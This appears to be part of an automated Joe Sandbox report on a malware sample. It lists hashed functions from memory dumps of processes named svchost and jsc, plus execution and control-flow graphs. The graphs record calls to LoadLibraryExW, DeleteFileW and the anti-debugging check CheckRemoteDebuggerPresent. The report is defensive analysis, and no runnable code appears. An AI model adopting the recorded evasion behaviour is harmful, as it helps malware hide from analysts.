                                                                          • Source File: 00000029.00000002.1993715405.00007FFD9B8BC000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8BC000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_41_2_7ffd9b8bc000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 42f1018ccafcb3dcb4f70a1bf9790f8f6541285a01352fd66a3e2e2dbfc07508
                                                                          • Instruction ID: 22cc141f57deae69ced0afaffeaf44e5a9944b9967b3237eed04b678641ac2f8
                                                                          • Opcode Fuzzy Hash: 42f1018ccafcb3dcb4f70a1bf9790f8f6541285a01352fd66a3e2e2dbfc07508
                                                                          • Instruction Fuzzy Hash: AF319EA290E3C14FE3179B7488614A53FB1AF57214B1E84EBC0C6CF4B7D518A90AD722
                                                                          Function 00007FFD9B8C52CE Relevance: .1, Instructions: 90COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000029.00000002.1993715405.00007FFD9B8BC000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8BC000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_41_2_7ffd9b8bc000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 25240eeb1028c7e0e2980295836c5738f11acca30b9f4db44f2cac306aa86171
                                                                          • Instruction ID: 46f41b802369d9b5df5d498b4d758726d5abff3455edb1ed50f1faf31c0db968
                                                                          • Opcode Fuzzy Hash: 25240eeb1028c7e0e2980295836c5738f11acca30b9f4db44f2cac306aa86171
                                                                          • Instruction Fuzzy Hash: 6411E42270D9090FE72CA66CA8571B873C2EB89371B1542BFE44EC32E6EC28994302C5
                                                                          Function 00007FFD9B8BDED8 Relevance: .1, Instructions: 82COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000029.00000002.1993715405.00007FFD9B8BC000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8BC000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_41_2_7ffd9b8bc000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 2516df1c9b3911e47a6f54b2a02ef204f21cb9fa132d34dac5441d9007baa26d
                                                                          • Instruction ID: 305911d2b9fc285731e44c1283d69b5c9b504594352fa9d3e200dddb8bffea12
                                                                          • Opcode Fuzzy Hash: 2516df1c9b3911e47a6f54b2a02ef204f21cb9fa132d34dac5441d9007baa26d
                                                                          • Instruction Fuzzy Hash: FA210A3061DB5D4FE354DB3884A407177D1FB98209715457ED89AC73B6DE35E942CB80
                                                                          Function 00007FFD9B8C6B4B Relevance: .1, Instructions: 79COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000029.00000002.1993715405.00007FFD9B8BC000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8BC000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_41_2_7ffd9b8bc000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 607f9f05f71e4fc244c4bb0445fee4aa30e3f42d84803d407a70554537ccab21
                                                                          • Instruction ID: 6a57b4f4e1ca17124e911008cb42938660af6941f0abdc6a5fea4048abebd856
                                                                          • Opcode Fuzzy Hash: 607f9f05f71e4fc244c4bb0445fee4aa30e3f42d84803d407a70554537ccab21
                                                                          • Instruction Fuzzy Hash: 023126A195E3C64FE7139B7488765A47FB0AF23214B1E84EBC0C5CF0B7D519A90AD722
                                                                          Function 00007FFD9B8C4C99 Relevance: .1, Instructions: 78COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000029.00000002.1993715405.00007FFD9B8BC000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8BC000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_41_2_7ffd9b8bc000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: c2a9bd368d071c87051b35a097a5c8ca3e7aaaab36432ec36a0f332ebf266c57
                                                                          • Instruction ID: 20f0a322340cbe12464e5f329716d6c920cb016fef73c3237acf096d2bc8cd3a
                                                                          • Opcode Fuzzy Hash: c2a9bd368d071c87051b35a097a5c8ca3e7aaaab36432ec36a0f332ebf266c57
                                                                          • Instruction Fuzzy Hash: 9F210471A0DA4D4FE351EB68C4282B577D0EF58310F0905BFD48CD71B3DE29AA828780
                                                                          Function 00007FFD9B8C6568 Relevance: .1, Instructions: 72COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000029.00000002.1993715405.00007FFD9B8BC000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8BC000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_41_2_7ffd9b8bc000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: ddc29bb6045bea4bc3cada8ca66cc0bd1651edca80d438f026c0ac9bc81aec43
                                                                          • Instruction ID: b78f27a9fc70d9031d6f03ca0b4bdcf88265601fe63832a7a28362e4f75d3406
                                                                          • Opcode Fuzzy Hash: ddc29bb6045bea4bc3cada8ca66cc0bd1651edca80d438f026c0ac9bc81aec43
                                                                          • Instruction Fuzzy Hash: 9101227260D60D1BD72C9D68882A477B78AD786610B12A33EF4A7C36A6DD64A80346C1
                                                                          Function 00007FFD9B8BFDDC Relevance: .1, Instructions: 59COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000029.00000002.1993715405.00007FFD9B8BC000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8BC000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_41_2_7ffd9b8bc000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: ee9209d813219a52742a482f5f6cd95e2776b74f5ef86152282051a8d098579e
                                                                          • Instruction ID: 1a193bf9cb2db3fe31ccbca6458606da37d89aaaef160ea2b932dd4f3ba1385f
                                                                          • Opcode Fuzzy Hash: ee9209d813219a52742a482f5f6cd95e2776b74f5ef86152282051a8d098579e
                                                                          • Instruction Fuzzy Hash: 81F0F452F1EEBF1EF7B6427D28A51380BC1EB9860071D42BBD498CA2E7EC055D4346C0
                                                                          Function 00007FFD9B8BE771 Relevance: .1, Instructions: 51COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000029.00000002.1993715405.00007FFD9B8BC000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8BC000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_41_2_7ffd9b8bc000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: a23f4b295f3d73133488af6354d09b76ceab211b570acd0a14e2dcbdf892d19a
                                                                          • Instruction ID: 269c4c798d485fda41ecf4ea308db2f57d6dfab85711e466f1e2509dabafb71d
                                                                          • Opcode Fuzzy Hash: a23f4b295f3d73133488af6354d09b76ceab211b570acd0a14e2dcbdf892d19a
                                                                          • Instruction Fuzzy Hash: 1EF04C3160DE884FC366D73C98504627BF0EFA521030A06E7D48AC76A6DD24EC46C780
                                                                          Function 00007FFD9B8C5C7A Relevance: .0, Instructions: 46COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000029.00000002.1993715405.00007FFD9B8BC000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8BC000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_41_2_7ffd9b8bc000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 6a19b35282efd6f9ec2789d56449c4af1b24b257ef06fc97fd9f749b1ef2ed9f
                                                                          • Instruction ID: 0590724f4449d08fb998bb51fa14360422b78146b3a5069cc9c9749e27d615ef
                                                                          • Opcode Fuzzy Hash: 6a19b35282efd6f9ec2789d56449c4af1b24b257ef06fc97fd9f749b1ef2ed9f
                                                                          • Instruction Fuzzy Hash: A6F04C3270961E0BDB1CEA9CD8A14F87383DB95350B04467BD107C66D5DE76BA428780
                                                                          Function 00007FFD9B8BC338 Relevance: .0, Instructions: 43COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000029.00000002.1993715405.00007FFD9B8BC000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8BC000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_41_2_7ffd9b8bc000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: f8bed930e0bf0bcd48225e2f89aad2cb74b31d254a2aa12c179aefd05d8e4f7a
                                                                          • Instruction ID: 42fb5fa9d012849c40f30ef9938a58eef6fbfb39f986e5c90b902aee393fdbca
                                                                          • Opcode Fuzzy Hash: f8bed930e0bf0bcd48225e2f89aad2cb74b31d254a2aa12c179aefd05d8e4f7a
                                                                          • Instruction Fuzzy Hash: 45F0341244F6EA0FD7135BB988B80857FA0AE0B51035E95FBC0C48F2E3D45E288BDB12
                                                                          Function 00007FFD9B8C59BD Relevance: .0, Instructions: 42COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000029.00000002.1993715405.00007FFD9B8BC000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8BC000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_41_2_7ffd9b8bc000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 539841ee5a329987f118a58751a5ec03986d89ace971c5ad9143992db7cdd6ba
                                                                          • Instruction ID: 1c647238c1dceb901a3f24268dba7c5d5cc8ae9770f46de84169388b2b05b792
                                                                          • Opcode Fuzzy Hash: 539841ee5a329987f118a58751a5ec03986d89ace971c5ad9143992db7cdd6ba
                                                                          • Instruction Fuzzy Hash: 41F0F631B196064BC71CDE2D896247477DBE7CA719720927ED097C62E5CE30F9138589
                                                                          Function 00007FFD9B8C6319 Relevance: .0, Instructions: 39COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000029.00000002.1993715405.00007FFD9B8BC000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8BC000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_41_2_7ffd9b8bc000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: ca4d158d4df08ff0d2fa51e2d191d2d16bf63d34e215f5e1a2fd23446b29102d
                                                                          • Instruction ID: 346ab3d1778291fcd264af80cf42c231d035223c02565934593ccf6f574933e9
                                                                          • Opcode Fuzzy Hash: ca4d158d4df08ff0d2fa51e2d191d2d16bf63d34e215f5e1a2fd23446b29102d
                                                                          • Instruction Fuzzy Hash: 8DF05931706A0A4BD368EA79C4909A5B3D3EBD8750B14833AD001C73E9DC34FD85C780
                                                                          Function 00007FFD9B8C539B Relevance: .0, Instructions: 34COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000029.00000002.1993715405.00007FFD9B8BC000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8BC000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_41_2_7ffd9b8bc000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: a520dcf6f3be42b51ab8b362e3d7396d8bb909f01dc83639d04aa69f4b6f74e0
                                                                          • Instruction ID: 1647b656b85037995d4c37c664de4b0fdb5c91cf52d1edaef28f8be3c165899c
                                                                          • Opcode Fuzzy Hash: a520dcf6f3be42b51ab8b362e3d7396d8bb909f01dc83639d04aa69f4b6f74e0
                                                                          • Instruction Fuzzy Hash: B4F0273170800A4FC72CAAA898170743186D70570072192BFD846CB2F6EC24D95246C2
                                                                          Function 00007FFD9B8C55E6 Relevance: .0, Instructions: 32COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000029.00000002.1993715405.00007FFD9B8BC000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8BC000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_41_2_7ffd9b8bc000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 9b74217f451b2082e244b4020ae2bc292f5d16e8914920d58089c07829d7d4e3
                                                                          • Instruction ID: a39f4dbf8b36283bb89ed8bb2ca551c1b4ae3e6f092351c555632fce1aabf38c
                                                                          • Opcode Fuzzy Hash: 9b74217f451b2082e244b4020ae2bc292f5d16e8914920d58089c07829d7d4e3
                                                                          • Instruction Fuzzy Hash: B3E09B93B39E490AFBACE76C54A55F553D2EFE835074045B7D04BC319BEC14B8064640
                                                                          Function 00007FFD9B8C6F1C Relevance: .0, Instructions: 22COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000029.00000002.1993715405.00007FFD9B8BC000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8BC000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_41_2_7ffd9b8bc000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 19e160b4f393dc15d76bbbc3b75762f638eb240959d3ed378125fe95afbd453a
                                                                          • Instruction ID: 4693eeaa7668b5ade8d0a4d00d89270110dd66c072d7d60dd1191cfc167b2027
                                                                          • Opcode Fuzzy Hash: 19e160b4f393dc15d76bbbc3b75762f638eb240959d3ed378125fe95afbd453a
                                                                          • Instruction Fuzzy Hash: CBE048B0719309CBD3256B95C41527D7791FFA5300F32447AE44A5B265C735DA46C781
                                                                          Function 00007FFD9B8C53E4 Relevance: .0, Instructions: 15COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000029.00000002.1993715405.00007FFD9B8BC000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8BC000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_41_2_7ffd9b8bc000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 54ee279aa6a9074b26d834cad0f23c60f09679a4f4529c985d22befd05b651f0
                                                                          • Instruction ID: 0d21aaa41a68b6a756799fe67c230d70305681af799577be66c521ff422360ad
                                                                          • Opcode Fuzzy Hash: 54ee279aa6a9074b26d834cad0f23c60f09679a4f4529c985d22befd05b651f0
                                                                          • Instruction Fuzzy Hash: B3D0C763F1956B07EA3D6A64017607C51C79758650B17507BEC4ADA1E2EC446E050186
                                                                          Function 00007FFD9B8C6DE1 Relevance: .0, Instructions: 15COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000029.00000002.1993715405.00007FFD9B8BC000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8BC000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_41_2_7ffd9b8bc000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 4537ebcc73ece9142f1f5ff107030371e35d6e76dda3d3fae7dbed42aba997e8
                                                                          • Instruction ID: 5ed03e80221b89d198e14b726d78a2396501d544665e26c26f6560fd5e9c608b
                                                                          • Opcode Fuzzy Hash: 4537ebcc73ece9142f1f5ff107030371e35d6e76dda3d3fae7dbed42aba997e8
                                                                          • Instruction Fuzzy Hash: 96D0A770B0D2094AC230A6BC540302875D19F953247281A7AD05B42299C825D91343C0
                                                                          Function 00007FFD9B8C6A93 Relevance: .0, Instructions: 13COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000029.00000002.1993715405.00007FFD9B8BC000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8BC000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_41_2_7ffd9b8bc000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 135877d9dcfc26f63c39ab67ceaba8f1c768ce313926fa1c0df68613db5ef272
                                                                          • Instruction ID: 51a1832e91996d61866718e9759b64ca673099accb55e079b54ede6ba59f06fb
                                                                          • Opcode Fuzzy Hash: 135877d9dcfc26f63c39ab67ceaba8f1c768ce313926fa1c0df68613db5ef272
                                                                          • Instruction Fuzzy Hash: 34D0A7306797458FD31CDF1480E143673E5EF99300F20983DE087822A0C535E442CA41
                                                                          Function 00007FFD9B8C6BB1 Relevance: .0, Instructions: 12COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000029.00000002.1993715405.00007FFD9B8BC000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8BC000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_41_2_7ffd9b8bc000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 4e527c1663f3c1cc927675c0f566ce96da8b551bd5ecfa4891235b4b95a44f88
                                                                          • Instruction ID: 6b3506487f1176d212a9cd77135016f952c60cf615cc33dc6f01fbb07daa9593
                                                                          • Opcode Fuzzy Hash: 4e527c1663f3c1cc927675c0f566ce96da8b551bd5ecfa4891235b4b95a44f88
                                                                          • Instruction Fuzzy Hash: B2D0A9B261E6098BD328EA24C0A21FAB282EB68300F20643EE087C3160DC20B8008B81
                                                                          Function 00007FFD9B8C5A73 Relevance: .0, Instructions: 12COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000029.00000002.1993715405.00007FFD9B8BC000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8BC000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_41_2_7ffd9b8bc000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 8ea1bc90e510883e059e2f3abb112b82bb1cbb8d4d43dd300c2f74324854e30e
                                                                          • Instruction ID: 8998b142abaed0daf9095e2e30ff76e00899798b8253b663ee69dfac85b5c3b5
                                                                          • Opcode Fuzzy Hash: 8ea1bc90e510883e059e2f3abb112b82bb1cbb8d4d43dd300c2f74324854e30e
                                                                          • Instruction Fuzzy Hash: 63C01261B2D30947861CDA1D813303DB6D69FCCA15B10657F948B921E2CD14AE059586
                                                                          Function 00007FFD9B8C6B04 Relevance: .0, Instructions: 11COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000029.00000002.1993715405.00007FFD9B8BC000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8BC000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_41_2_7ffd9b8bc000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: b9854ea09fd2c3c57b603a23721703664b821dbcdf15a0c8d512b0f2952f86a1
                                                                          • Instruction ID: fc82a5edc8a87f7dfbfc53c7d33424e1183d21fd1ca2a9834c254310598d82c3
                                                                          • Opcode Fuzzy Hash: b9854ea09fd2c3c57b603a23721703664b821dbcdf15a0c8d512b0f2952f86a1
                                                                          • Instruction Fuzzy Hash: 06D0C9B664A7198FE3249B24815446872E2AF99245B115438E04A87371DA74EA01CA41
                                                                          Function 00007FFD9B8C6991 Relevance: .0, Instructions: 9COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000029.00000002.1993715405.00007FFD9B8BC000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8BC000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_41_2_7ffd9b8bc000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: fc8196ce643bdab81fbbcd4c285ce023b9efa77cbe53fc9dc7e56f218e691e6d
                                                                          • Instruction ID: 0526eed9d25eb94a47c3ce6a2ea8c81fd12b9e4cfaaa7b9e7138d7a4fa158e49
                                                                          • Opcode Fuzzy Hash: fc8196ce643bdab81fbbcd4c285ce023b9efa77cbe53fc9dc7e56f218e691e6d
                                                                          • Instruction Fuzzy Hash: C5C08CB422D74E4FC22CEA38C8A147BB750ABA8200F21343EB083821B1DD00F5408A42

                                                                          Execution Graph

                                                                          Execution Coverage:11.5%
                                                                          Dynamic/Decrypted Code Coverage:54.5%
                                                                          Signature Coverage:0%
                                                                          Total number of Nodes:11
                                                                          Total number of Limit Nodes:1
                                                                          execution_graph 27716 6f0fde2 27720 6f0fc71 27716->27720 27717 6f0fe0b 27718 6f0fe78 LoadLibraryExW 27719 6f0fea9 27718->27719 27720->27717 27720->27718 27721 10cb650 27722 10cb696 DeleteFileW 27721->27722 27724 10cb6cf 27722->27724 27725 10c7ee0 27726 10c7f24 CheckRemoteDebuggerPresent 27725->27726 27727 10c7f66 27726->27727

                                                                          Executed Functions

                                                                          Function 06F0F7D8 Relevance: 2.0, APIs: 1, Instructions: 535COMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 2029 6f0f7d8-6f0f7f8 2030 6f0f7fa-6f0f7fd 2029->2030 2031 6f0f80f-6f0f812 2030->2031 2032 6f0f7ff-6f0f80a 2030->2032 2033 6f0f824-6f0f827 2031->2033 2034 6f0f814-6f0f81d 2031->2034 2032->2031 2035 6f0f852-6f0f855 2033->2035 2036 6f0f829-6f0f84d 2033->2036 2038 6f0f883-6f0f88c 2034->2038 2039 6f0f81f 2034->2039 2040 6f0f910-6f0f919 2035->2040 2041 6f0f85b-6f0f85e 2035->2041 2036->2035 2042 6f0f892-6f0f899 2038->2042 2043 6f0fb75-6f0fbad 2038->2043 2039->2033 2044 6f0f9df-6f0f9e8 2040->2044 2045 6f0f91f 2040->2045 2047 6f0f860-6f0f879 2041->2047 2048 6f0f87e-6f0f881 2041->2048 2049 6f0f89e-6f0f8a1 2042->2049 2061 6f0fbaf-6f0fbb2 2043->2061 2044->2043 2054 6f0f9ee-6f0f9f5 2044->2054 2052 6f0f924-6f0f927 2045->2052 2047->2048 2048->2038 2048->2049 2050 6f0f8a3-6f0f8c8 2049->2050 2051 6f0f8cd-6f0f8d0 2049->2051 2050->2051 2058 6f0f8f1-6f0f8f4 2051->2058 2059 6f0f8d2-6f0f8ec 2051->2059 2055 6f0f943-6f0f946 2052->2055 2056 6f0f929-6f0f938 2052->2056 2062 6f0f9fa-6f0f9fd 2054->2062 2064 6f0f967-6f0f96a 2055->2064 2065 6f0f948-6f0f962 2055->2065 2085 6f0fb50-6f0fb53 2056->2085 2086 6f0f93e 2056->2086 2066 6f0f8f6-6f0f8f9 2058->2066 2067 6f0f8fe-6f0f901 2058->2067 2059->2058 2068 6f0fbb4-6f0fbd0 2061->2068 2069 6f0fbd5-6f0fbd8 2061->2069 2070 6f0fa20-6f0fa23 2062->2070 2071 6f0f9ff-6f0fa1b 2062->2071 2079 6f0f974-6f0f977 2064->2079 2080 6f0f96c-6f0f971 2064->2080 2065->2064 2066->2067 2081 6f0f903-6f0f908 2067->2081 2082 6f0f90b-6f0f90e 2067->2082 2068->2069 2072 6f0fbda-6f0fbe8 2069->2072 2073 6f0fbef-6f0fbf2 2069->2073 2075 6f0fa25-6f0fa49 2070->2075 2076 6f0fa4e-6f0fa51 2070->2076 2071->2070 2097 6f0fc04-6f0fc1d 2072->2097 2106 6f0fbea 2072->2106 2087 6f0fbf4-6f0fbfe 2073->2087 2088 6f0fbff-6f0fc02 2073->2088 2075->2076 2090 6f0fa53-6f0fa59 2076->2090 2091 6f0fa5e-6f0fa61 2076->2091 2092 6f0f979-6f0f98a 2079->2092 2093 6f0f98f-6f0f992 2079->2093 2080->2079 2081->2082 2082->2040 2082->2052 2103 6f0fb58-6f0fb5a 2085->2103 2086->2055 2088->2097 2098 6f0fc2a-6f0fc2d 2088->2098 2090->2091 2099 6f0fa63-6f0fa69 2091->2099 2100 6f0fa6e-6f0fa71 2091->2100 2092->2093 2101 6f0f9b3-6f0f9b6 2093->2101 2102 6f0f994-6f0f9ae 2093->2102 2132 6f0fc5f-6f0fc6b 2097->2132 2142 6f0fc1f-6f0fc29 2097->2142 2110 6f0fc4d-6f0fc4f 2098->2110 2111 6f0fc2f-6f0fc48 2098->2111 2099->2100 2108 6f0fa82-6f0fa85 2100->2108 2109 6f0fa73-6f0fa77 2100->2109 2112 6f0f9b8-6f0f9c8 2101->2112 2113 6f0f9cd-6f0f9d0 2101->2113 2102->2101 2115 6f0fb61-6f0fb64 2103->2115 2116 6f0fb5c 2103->2116 2106->2073 2121 6f0fae7-6f0faea 2108->2121 2122 6f0fa87-6f0fae2 2108->2122 2119 6f0f9d2-6f0f9d5 2109->2119 2120 6f0fa7d 2109->2120 2124 6f0fc51 2110->2124 2125 6f0fc56-6f0fc59 2110->2125 2111->2110 2112->2113 2113->2119 2127 6f0f9da-6f0f9dd 2113->2127 2115->2030 2126 6f0fb6a-6f0fb74 2115->2126 2116->2115 2119->2127 2120->2108 2128 6f0fb13-6f0fb16 2121->2128 2129 6f0faec-6f0fb0e 2121->2129 2122->2121 2124->2125 2125->2061 2125->2132 2127->2044 2127->2062 2128->2034 2134 6f0fb1c-6f0fb1f 2128->2134 2129->2128 2137 6f0fc71-6f0fc7a 2132->2137 2138 6f0fe0b-6f0fe15 2132->2138 2140 6f0fb21-6f0fb46 2134->2140 2141 6f0fb4b-6f0fb4e 2134->2141 2144 6f0fc80-6f0fca0 2137->2144 2145 6f0fe16-6f0fe70 2137->2145 2140->2141 2141->2085 2141->2103 2159 6f0fca6-6f0fcaf 2144->2159 2160 6f0fdf9-6f0fe05 2144->2160 2151 6f0fe72-6f0fe75 2145->2151 2152 6f0fe78-6f0fea7 LoadLibraryExW 2145->2152 2151->2152 2157 6f0feb0-6f0fecd 2152->2157 2158 6f0fea9-6f0feaf 2152->2158 2158->2157 2159->2145 2162 6f0fcb5-6f0fce4 call 6f09bf8 2159->2162 2160->2137 2160->2138 2173 6f0fd26-6f0fd3c 2162->2173 2174 6f0fce6-6f0fd1e 2162->2174 2177 6f0fd5a-6f0fd70 2173->2177 2178 6f0fd3e-6f0fd52 2173->2178 2174->2173 2183 6f0fd72-6f0fd86 2177->2183 2184 6f0fd8e-6f0fda1 2177->2184 2178->2177 2183->2184 2187 6f0fda3-6f0fdad 2184->2187 2188 6f0fdaf 2184->2188 2189 6f0fdb4-6f0fdb6 2187->2189 2188->2189 2190 6f0fde7-6f0fdf3 2189->2190 2191 6f0fdb8-6f0fdbd 2189->2191 2190->2159 2190->2160 2192 6f0fdcb 2191->2192 2193 6f0fdbf-6f0fdc9 2191->2193 2194 6f0fdd0-6f0fdd2 2192->2194 2193->2194 2194->2190 2195 6f0fdd4-6f0fde0 2194->2195 2195->2190
                                                                          Memory Dump Source
                                                                          • Source File: 00000030.00000002.2937670409.0000000006F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F00000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_48_2_6f00000_jsc.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 04e6b3abe11518dea5549a2c1c62c256f86f64e515810bb6c14fc44743600590
                                                                          • Instruction ID: 76c804c783d637f130110ace8244e72c979b37dddba58c745819cbc6ca1b08c4
                                                                          • Opcode Fuzzy Hash: 04e6b3abe11518dea5549a2c1c62c256f86f64e515810bb6c14fc44743600590
                                                                          • Instruction Fuzzy Hash: 57129E74E012099FEB60DF68D890BAEB7B6FB88310F108525D809E7395DB34EC46DB91
                                                                          Function 010C7EE0 Relevance: 1.6, APIs: 1, Instructions: 65COMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 2375 10c7ee0-10c7f64 CheckRemoteDebuggerPresent 2377 10c7f6d-10c7fa8 2375->2377 2378 10c7f66-10c7f6c 2375->2378 2378->2377
                                                                          APIs
                                                                          • CheckRemoteDebuggerPresent.KERNELBASE(?,?), ref: 010C7F57
                                                                          Memory Dump Source
